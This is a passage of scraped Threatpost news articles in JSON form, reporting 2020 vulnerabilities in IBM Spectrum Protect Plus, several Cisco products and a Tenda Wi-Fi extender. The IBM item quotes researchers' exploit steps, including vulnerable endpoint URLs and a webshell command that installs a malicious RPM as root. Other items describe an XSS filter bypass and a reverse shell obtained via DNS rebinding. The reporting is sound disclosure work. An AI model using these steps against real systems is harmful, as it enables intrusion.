and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-20T15:39:38", "type": "threatpost", "title": "Microsoft Out-of-Band Security Update Fixes Windows Remote Access Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1530", "CVE-2020-1537", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-20T15:39:38", "id": "THREATPOST:197A12EF32429D29CF6A84B11763834D", "href": "https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:13:56", "description": "IBM has issued fixes for vulnerabilities in Spectrum Protect Plus, Big Blue\u2019s security tool found under the umbrella of its Spectrum data storage software branding. The flaws can be exploited by remote attackers to execute code on vulnerable systems.\n\nIBM Spectrum Protect Plus is a data-protection solution that provides near-instant recovery, replication, reuse and self-service for virtual machines. The vulnerabilities (CVE-2020-4703 and CVE-2020-4711) affect versions 10.1.0 through 10.1.6 of IBM Spectrum Protect Plus.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\nThe more serious of the two flaws (CVE-2020-4703) exists in IBM Spectrum Protect Plus\u2019 Administrative Console and could allow an authenticated attacker to upload arbitrary files \u2013 which could then be used to execute arbitrary code on the vulnerable server, according to researchers with Tenable, who discovered the flaws, [in a Monday advisory](<https://www.tenable.com/security/research/tra-2020-54>). The bug ranks 8 out of 10 on the CVSS scale, making it high-severity.\n\nThis vulnerability is due to an incomplete fix for CVE-2020-4470, a high-severity flaw [that was previously disclosed in June](<https://nvd.nist.gov/vuln/detail/CVE-2020-4470>). An exploit for CVE-2020-4470 involves two operations, Tenable researchers said: \u201cThe first operation is to upload a malicious RPM package to a directory writable by the administrator account by sending an HTTP POST message to URL endpoint https://&lt;spp_host&gt;:8090/api/plugin,\u201d they said. \u201cThe second operation is to install the malicious RPM by sending an HTTP POST message to URL endpoint http://&lt;spp_host&gt;:8090/emi/api/hotfix.\u201d\n\nBut IBM\u2019s ensuing fix for CVE-2020-4470 only addressed the second operation by enforcing authentication for the /emi/api/hotfix endpoint. Researchers found, it was still possible to upload unauthenticated arbitrary files to a directory writable by the administrator account, under which the endpoint handlers run \u2013 paving the way for code execution on vulnerable systems.\n\n\u201cThe attacker can put malicious content (i.e., scriptlets) in the RPM and and issue a \u2018sudo /bin/rpm -ivh /tmp/&lt;uploaded_malicious_rpm&gt;\u2019 command to the webshell, achieving unauthenticated RCE as root,\u201d said researchers.\n\nThe second flaw, CVE-2020-4711, exists in a script (/opt/ECX/tools/scripts/restore_wrapper.sh) within Spectrum Protect Plus. A directory path check within this function can be bypassed via path traversal. An unauthenticated, remote attacker can exploit this issue by sending a specially crafted HTTP request to a specially-crafted URL endpoint (https://&lt;spp_host&gt;:8090/catalogmanager/api/catalog), Tenable researchers said.\n\nThat endpoint doesn\u2019t require any authentication (when the cmode parameter is the restorefromjob method). When the request has been sent, the endpoint handler instead calls a method (com.catalogic.ecx.catalogmanager.domain.CatalogManagerServiceImpl.restoreFromJob) without checking for user credentials. The restoreFromJob method then executes the /opt/ECX/tools/scripts/restore_wrapper.sh script as root \u2013 allowing the attacker to view arbitrary files on the system.\n\nTenable researchers discovered the flaws on July 31 and reported them to IBM on Aug. 18. IBM released the patches and an advisory disclosing the flaws on Monday. Threatpost has reached out to IBM for further comment.\n\nIn recent months, various IBM products have been found to have security vulnerabilities. In August, a shared-memory flaw was discovered in [IBM\u2019s next-gen data-management software](<https://threatpost.com/ibm-ai-powered-data-management-software-subject-exploit/158497/>) that researchers said could lead to other threats \u2014 as demonstrated by a new proof-of-concept exploit for the bug.\n\nAnd in April, four serious security vulnerabilities in [the IBM Data Risk Manager](<https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/>) (IDRM) were identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-15T19:08:13", "type": "threatpost", "title": "IBM Spectrum Protect Plus Security Open to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-4470", "CVE-2020-4703", "CVE-2020-4711", "CVE-2020-5135"], "modified": "2020-09-15T19:08:13", "id": "THREATPOST:033645C929899D29D91092278D188D8E", "href": "https://threatpost.com/ibm-flaws-spectrum-protect-plus/159268/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:03", "description": "Cisco patched a critical flaw in its wide area network (WAN) software solution for enterprises, which if exploited could give remote, unauthenticated attackers administrator privileges.\n\nThe flaw exists in Cisco Virtual Wide Area Application Services (vWAAS), which is software that Cisco describes as a \u201cWAN optimization solution.\u201d It helps manage business applications that are being leveraged in virtual private cloud infrastructure. The flaw (CVE-2020-3446), which has a critical-severity CVSS score of 9.8 out of 10, exists because user accounts for accessing the software contain default passwords. That means an attacker could log in, via a default password, and thus potentially obtain administrator privileges.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory,\u201d according to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-encsw-cspw-cred-hZzL29A7>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nvWAAS is hosted in compute appliances called Cisco Enterprise Network Compute Series (ENCS). These appliances are also used to deploy the Cisco Enterprise NFV Infrastructure Software (NFVIS), a [software platform](<https://blogs.cisco.com/networking/what-is-cisco-nfv-infrastructure-software>) that implements full lifecycle management from the central orchestrator and controller for virtualized services.\n\nThis vulnerability specifically affects Cisco ENCS 5400-W Series and CSP 5000-W Series appliances if they are running Cisco vWAAS with NFVIS-bundled image releases 6.4.5, or 6.4.3d and earlier. The flaw is fixed in Cisco vWAAS with NFVIS-bundled image release 6.4.3e, 6.4.5a, and later releases.\n\nWhile an attacker could be unauthenticated and remote, in order to exploit this vulnerability, they would need to be able to connect to the NFVIS command line interface (CLI) on an affected device. This would require access to one of the following:\n\n * The Ethernet management port for the CPU on an affected ENCS 5400-W Series appliance.\n * The first port on the four-port I350 PCIe Ethernet Adapter card on an affected CSP 5000-W Series appliance.\n * A connection to the vWAAS software CLI and a valid user credential to authenticate on the vWAAS CLI first.\n * Or a connection to the Cisco Integrated Management Controller (CIMC) interface of the ENCS 5400-W Series or CSP 5000-W Series appliance (and a valid user credential to authenticate to the CIMC first).\n\nCisco on Wednesday also issued patches for two high-severity vulnerabilities (CVE-2020-3506, CVE-2020-3507) in its Video Surveillance 8000 Series IP cameras, which could enable remote code execution and denial of services (DoS).\n\n\u201cMultiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera,\u201d according to Cisco.\n\nAnd, a high-severity flaw (CVE-2020-3443) [found and fixed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smart-priv-esca-nqwxXWBu>) in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges and execute commands with higher privileges.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-08-20T12:43:13", "type": "threatpost", "title": "Cisco Critical Flaw Patched in WAN Software Solution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3443", "CVE-2020-3446", "CVE-2020-3506", "CVE-2020-3507"], "modified": "2020-08-20T12:43:13", "id": "THREATPOST:245021185706E94E1CA436608011DDB2", "href": "https://threatpost.com/cisco-critical-flaw-patched-in-wan-software-solution/158485/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:25:44", "description": "A critical Cisco vulnerability exists in its administrative management tool for Cisco network security solutions. The flaw could allow an unauthenticated, remote attacker to gain administrative privileges on impacted devices.\n\nThe flaw exists in the web-based management interface of the [Cisco Firepower Management Center](<https://www.cisco.com/c/en_au/products/security/firesight-management-center/index.html>) (FMC), which is its platform for managing Cisco network security solutions, like [firewalls](<https://www.cisco.com/c/en_au/products/security/firewalls/index.html#~stickynav=1>) or its [advanced malware protection](<https://www.cisco.com/c/en_au/products/security/advanced-malware-protection/index.html>) service. Cisco has released patches for the vulnerability (CVE-2019-16028), which has a score of 9.8 out of 10 on the CVSS scale, making it critical in severity.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory,\u201d Cisco said in its [advisory released Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-fmc-auth>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability stems from \u201cimproper handling\u201d of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. LDAP is an industry standard application protocol used to access and manage directory information over an IP network.\n\nLDAP is used for a variety of functions within FMC, such as FMC Web Management Portal Authentication, Remote Access VPN Authorization, command line interface authorization, and others. This vulnerability impacts only the FMC Web Management Portal if it is configured to authenticate users of the web management portal through an external LDAP server.\n\nAn attacker could exploit this vulnerability by sending crafted HTTP requests to a vulnerable device, Cisco said. They could then bypass authentication and gain administrative access to the web-based management interface of the affected device.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/23102124/cisco-patches.png>)\n\n[According to Omar Santos](<https://community.cisco.com/t5/security-documents/assessing-the-impact-of-the-cisco-firepower-management-center/ta-p/4016460>), principal engineer for the Cisco PSIRT, Cisco customers can do the following to determine whether they are impacted:\n\n * Check if the Cisco FMC Software is configured to authenticate users of the web-based management interface through an external LDAP server;\n * Check if external authentication using an LDAP server is configured on the device (System &gt; Users &gt; External Authentication)\n\nOverall, Cisco [released updates addressing 27 flaws](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities>) on Wednesday, including the critical flaw, seven high-severity vulnerabilities and 19 medium-severity glitches. Some of the patched high-severity flaws exist in Cisco\u2019s [TelePresence Collaboration Endpoint](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-telepresence-path-tr-wdrnYEZZ>) (a product designed to link two rooms so they resemble a single conference room), [its SD-WAN](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-cred-EVGSF259>) solution, its [IOS XR software](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-ios-xr-routes>) and more.\n\nIt\u2019s been a busy start to 2020 so far for Cisco in terms of security updates. Earlier this month, Cisco [fixed two high-severity vulnerabilities](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) in its products, including one in its popular Webex video conferencing platform, that could enable a remote attacker to execute commands.\n\nAlso earlier in January [Cisco also patched three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) in its Data Center Network Manager (DCNM), for which a [proof-of-concept exploit](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) was later published.\n", "cvss3": {}, "published": "2020-01-23T15:56:41", "type": "threatpost", "title": "Cisco Warns of Critical Network Security Tool Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2019-16028", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-23T15:56:41", "id": "THREATPOST:62D348CF6DAF40D6FBCD313A3BCEDBF9", "href": "https://threatpost.com/cisco-critical-network-security-tool-flaw/152131/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:16", "description": "Cisco Systems has patched two high-severity vulnerabilities in its popular Webex video conferencing platform, which if exploited could allow an attacker to execute code on affected systems.\n\nTwo multimedia players tied to the Webex platform are impacted. First is the Cisco Webex Network Recording Player, used to play back Advanced Recording Format (ARF) files on the Windows operating system. ARF files contain data from a recorded online meeting, such as video data and a list of attendees. Cisco Webex Player is also affected, which used to play back Webex Recording Format (WRF) files on the Windows OS. WRF files contain audio and video recordings, typically used for demonstrations, training and conferencing.\n\nThe vulnerabilities ([CVE-2020-3127](<https://nvd.nist.gov/vuln/detail/CVE-2020-3127>) and [CVE-2020-3128](<https://nvd.nist.gov/vuln/detail/CVE-2020-3128>)) are both 7.8 out of 10.0 on the CVSS scale, making them high-severity. They stem from an insufficient validation of non-detailed, \u201ccertain elements\u201d within a Webex recording that is stored in either ARF or WRF, said Cisco.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile Cisco did not detail the technicalities of the vulnerabilities, it said that \u201can attacker could exploit these vulnerabilities by sending a malicious ARF or WRF file to a user through a link or email attachment and persuading the user to open the file on the local system,\u201d according to Cisco in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200304-webex-player>). \u201cA successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user.\u201d\n\nBrian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program, told Threatpost that the flaw allows remote attackers to execute arbitrary code \u2013 but it does require user interaction.\n\n\u201cUser interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file,\u201d he told Threatpost via email. \u201cSpecifically, this bug exists is in atpdmod.dll module and the vulnerable code is reachable using a crafted ARF File. This program fails to initialize a pointer and later writes data to this pointer. In the worst case, this could lead to remote code execution in the context of the current process.\u201d\n\nDifferent versions of Webex Network Recording Player and Webex Player are affected by the flaws, based on the platforms they are being managed on. The players are available from Cisco Webex Meetings and Cisco Webex Meetings Online (which is when conferencing systems are managed by Cisco Webex), and Cisco Webex Meetings Server (where customers host and manage conferencing solutions in their own private clouds).\n\nFor Cisco Webex Meetings, affected versions for both products include releases earlier than WBS 39.5.17 or WBS 39.11.0. For Webex Meetings Online, affected versions for both products include releases earlier than 1.3.49. And, for Cisco Webex Meetings Server, versions of Webex Network Recording Player earlier 3.0MR3SecurityPatch1 and 4.0MR2SecurityPatch2 are affected.\n\nTo determine which release of Cisco Webex Network Recording Player or Cisco Webex Player is installed on a system, users can open the player and choose Help &gt; About. The fixed releases can be found below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/05093159/Screen-Shot-2020-03-05-at-9.05.50-AM.png>)\n\nCisco said it\u2019s not aware of the flaws being exploited by attackers at this time. Francis Provencher (PRL) working with Trend Micro Zero Day Initiative, and Kexu Wang of Fortinet\u2019s FortiGuard Labs were credited with discovering the flaws (Threatpost has reached out to both researchers for further details of the vulnerability and will update this post accordingly).\n\nWebex has been haunted by other vulnerabilities since the start of the year. In January, [Cisco fixed a high-severity vulnerability](<https://threatpost.com/cisco-webex-flaw-lets-unauthenticated-users-join-private-online-meetings/152191/>) in Webex that could have let strangers barge in on password-protected meetings sans authentication. A [separate high-severity flaw](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) also disclosed by Cisco in January could enable a remote attacker to execute commands in Webex.\n\nBeyond Webex, Cisco on Wednesday [released patches addressing](<https://tools.cisco.com/security/center/publicationListing.x>) flaws tied to a total of 13 CVEs. Other high-severity flaws include a vulnerability in the SSL implementation of the Cisco Intelligent Proximity solution, which is a tool allowing users to see and control content in a meeting room from their own devices. The certificate validation vulnerability ([CVE-2020-3155](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-proximity-ssl-cert-gBBu3RB>)) could allow an unauthenticated, remote attacker to view or alter information shared on Cisco Webex video devices and Cisco collaboration endpoints.\n\nAnd, a high-severity cross-site request forgery (CSRF) flaw exists in Cisco Prime Network Registrar, software that is comprised of components for various services, including Domain Name System (DNS) services and Dynamic Host Configuration Protocol services. The flaw (CVE-2020-3148) in the online interface of the registrar could allow an unauthenticated, remote attacker to conduct a CSRF attack on an affected systems.\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-05T15:11:11", "type": "threatpost", "title": "High-Severity Cisco Webex Flaws Fixed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3127", "CVE-2020-3128", "CVE-2020-3148", "CVE-2020-3155"], "modified": "2020-03-05T15:11:11", "id": "THREATPOST:FC2AB9DBD639AEF3E55048C4BBCFC321", "href": "https://threatpost.com/high-severity-cisco-webex-flaws-fixed/153462/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:14:21", "description": "Researchers are warning of a critical remote code-execution (RCE) flaw in the Windows version of Cisco Jabber, the networking company\u2019s video-conferencing and instant-messaging application. Attackers can exploit the flaw merely by sending targets specially crafted messages \u2013 no user interaction required.\n\nThe flaw ([CVE-2020-3495](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-UyTKCPGg>)) has a CVSS score of 9.9 out of 10, making it critical in severity, Cisco said in a Wednesday advisory. Researchers with Watchcom, who discovered the flaw, said that with remote workforces surging during the [coronavirus pandemic](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>), the implications of the vulnerability are especially serious.\n\n\u201cGiven their newfound prevalence in organizations of all sizes, these applications are becoming an increasingly attractive target for attackers,\u201d Watchcom researchers said in an [analysis on Wednesday](<https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/>). \u201cA lot of sensitive information is shared through video calls or instant messages, and the applications are used by the majority of employees, including those with privileged access to other IT systems.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAn attacker could exploit the flaw by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages to vulnerable end-user systems running Cisco Jabber for Windows. XMPP is an XML-based protocol for instant messaging, based on an open standard, which is widely used in both open-source and proprietary software.\n\nWhile attackers can be remote to launch such an attack, they may require access to the same XMPP domain or another method of access to be able to send messages to clients, according to researchers. However, for the most part, the attack is easy to carry out: No user interaction is required on the part of the targeted victim, and the vulnerability can be exploited even when Cisco Jabber is running in the background.\n\nThe issue stems from Cisco Jabber improperly validating message contents; the application does not properly sanitize incoming HTML messages. It instead passes the messages through a flawed cross-site scripting (XSS) filter. Researchers discovered that this filter could be bypassed using an attribute called \u201conanimationstart.\u201d This attribute is used to specify a JavaScript function that will be called when an element\u2019s CSS animation starts playing.\n\nUsing the attribute (along with a built-in animation assigned to it) researchers found it was possible to create malicious HTML tags that the filter did not catch, and were ultimately executed. As a final step, researchers created a malicious message using these HTML tags, that then intercepted an XMPP message sent by the application and modified it.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/03125156/jabber-calc.gif>)\n\nThe Jabber RCE vulnerability in action. Credit: Watchcom\n\nAttackers can do this manually on their own machine or it can be automated to create a worm that spreads automatically, said researchers.\n\nFinally, \u201cas a result of exploitation, an attacker could cause the application to run an arbitrary executable that already exists within the local file path of the application,\u201d according to Cisco. \u201cThe executable would run on the end-user system with the privileges of the user who initiated the Cisco Jabber client application.\u201d\n\nSystems using Cisco Jabber in phone-only mode (without XMPP messaging services enabled) are not vulnerable to exploitation, Cisco\u2019s advisory said. In addition, the vulnerability is not exploitable when Cisco Jabber is configured to use messaging services other than XMPP messaging.\n\nThe vulnerabilities affect all currently supported versions of the Cisco Jabber client (12.1 \u2013 12.9). Cisco has released updates for different releases of affected Cisco Jabber. See the fixes in the table below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/03125052/cisco-jabber.png>)\n\nResearchers said that they found three other vulnerabilities in Cisco Jabber, including a protocol-handler-command infection (CVE-2020-3430), an information-disclosure flaw (CVE-2020-3498) and a Universal Naming Convention link-handling issue (CVE-2020-3537).\n\nCisco said it is not aware of any public announcements or malicious use of the flaw.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-03T17:30:07", "type": "threatpost", "title": "Attackers Can Exploit Critical Cisco Jabber Flaw With One Message", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3430", "CVE-2020-3495", "CVE-2020-3498", "CVE-2020-3537"], "modified": "2020-09-03T17:30:07", "id": "THREATPOST:D2E35B61D2D9455A00F50AC6B8A5A129", "href": "https://threatpost.com/attackers-can-exploit-critical-cisco-jabber-flaw-with-one-message/158942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:39", "description": "A popular Wi-Fi extender for the home has multiple unpatched vulnerabilities, including the use of a weak, default password, according to researchers. Also, two of the bugs could allow complete remote control of the device.\n\nThe flaws have been found in Tenda PA6 Wi-Fi Powerline extender, version 1.0.1.21, which extends the wireless network throughout the house using [HomePlug AV2](<https://en.wikipedia.org/wiki/HomePlug>) technology.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA compromised device can become part of an internet of things (IoT) botnet that launches distributed denial-of-service (DDoS) attacks, used to pivot to other connected devices, leveraged to mine for cryptocurrency or used in various other unauthorized ways,\u201d explained researchers at IBM X-Force, [in a posting](<https://securityintelligence.com/posts/vulnerable-powerline-extenders-underline-lax-iot-security/>) last week.\n\n## **Web Server Woes**\n\nThe first two bugs are a command-injection issue ([CVE-2019-16213](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172226?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)); and a critical buffer overflow ([CVE-2019-19505](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172228?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)). They are found in the extender device\u2019s web server, under a process named \u201chttpd.\u201d\n\nThe command-injection vulnerability carries a rating of 8.8 out of 10 on the CVSS severity scale. It arises from the fact that under the \u201cPowerline\u201d section in the user interface (UI) of the extender\u2019s web server, the user can see and change the name of the other powerline communication (PLC) devices which are attached to the same powerline network. An authenticated user can inject an arbitrary command just by changing the device name of an attached PLC adapter with a specially crafted string, the researchers noted. Since the web server is running with root privileges, an attacker could leverage this injection to fully compromise the device.\n\n\u201cThe name entered by the user is concatenated as an argument to the \u2018homeplugctl\u2019 application and being executed by the system\u2019 library function,\u201d according to IBM X-Force. \u201cThis user input is just URL decoded, without any validation or sanitation.\u201d\n\nThe second vulnerability is found in the \u201cWireless\u201d section in the web-UI: By adding a device to the Wireless Access Control list with a specially crafted hostname, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. It\u2019s listed as critical, with a 9.8 severity rating.\n\n\u201cIt is possible to overwrite the return address register $ra and begin controlling program execution,\u201d according to the analysis. \u201cA motivated attacker can utilize this to potentially execute arbitrary code. Note that the overflow isn\u2019t a result of an unsafe call to functions like strcpy or memcpy.\u201d\n\n## **Pivoting to a Remote Attack**\n\nBoth bugs are post-authentication \u2013 so a user would need to be signed in to exploit the bugs. But there\u2019s a big caveat to this: The web server itself is password-protected with the default (and very guessable) password \u201cadmin.\u201d\n\n\u201cBoth vulnerabilities in this web-UI allow an authenticated user to compromise the device with root privileges, and while authentication should provide a layer of security, in this case, with a weak and guessable password, it should not be considered adequate protection,\u201d explained the researchers.\n\nSimilarly, the web server interface should only be accessible from the local network \u2013 however, a wrong setup and configuration can expose it to the internet and therefore remote attackers. And, IBM X-Force found that combining these vulnerabilities with a DNS rebinding technique provides the attacker with a remote vector that doesn\u2019t depend on the user\u2019s configuration.\n\n\u201cThat remote attack vector is not far-fetched here, and using a technique called DNS rebinding, we were able to perform the same attack from a remote website, overcoming same-origin limitations by the browser,\u201d said the researchers. \u201cWith this known technique, once the victim is tricked into visiting a malicious website, their entire local network is exposed to the attacker.\u201d\n\nDNS rebinding involves using a malicious JavaScript payload to scan the local network looking for vulnerable powerline extenders. If found, a login could be attempted using a list of popular passwords.\n\n\u201cIn our demo we were able to get a reverse shell on the vulnerable device just by having someone with access to the device\u2019s network visit our website,\u201d said the researchers. This is significant as it allows an attacker to gain control over the vulnerable devices remotely just by having the victim visit a website.\u201d\n\n## **Pre-Auth Denial of Service**\n\nThe third vulnerability ([CVE-2019-19506](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172229?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)), which rates 7.5 out of 10 on the severity scale, resides in a process named \u201chomeplugd,\u201d which is related to the extender device\u2019s powerline functionality. By sending a specially crafted UDP packet, an attacker could exploit this vulnerability to cause the device to reboot. By causing a recurring reboot, the device will loop through restarts and not be able to carry out its functions or connect to the internet.\n\nUnlike the other two bugs, an attacker in this case would not need to be authenticated.\n\n\u201cAs we were inspecting the open ports and their corresponding services on the extender, we noticed the homeplugd process listening on UDP port 48912,\u201d according to the analysis. \u201cReversing the binary revealed to us that no authentication was required to interact with this service.\u201d\n\n## **Patch Status**\n\nThere are for now no patches for the issues.\n\n\u201cUnfortunately, despite repeated attempts to contact Tenda, IBM is yet to receive any reply to its emails and phone calls,\u201d the researchers said. \u201cIt remains unknown whether the company is working on patches.\u201d\n\nThreatpost has also reached out to the vendor for more information.\n\nTo protect themselves, users should change default passwords on all devices that connect to the internet; update firmware regularly; and use use internal filtering controls or a firewall.\n\n\u201cWhile most flaws in popular software are addressed and patched, devices like powerline extenders, [and even routers](<https://threatpost.com/cisco-ios-xe-flaw-sd-wan-routers/155319/>), do not seem to receive the same treatment, and are all too often left exposed to potential attacks,\u201d the researchers concluded. \u201cBut these devices are not just a connectivity plug on the edge of the network. A critical enough vulnerability can be leveraged to reach other parts of the network. That is especially true for routers, but it also extends to other devices that have some sort of interface into the network.\u201d\n\n**_BEC and enterprise email 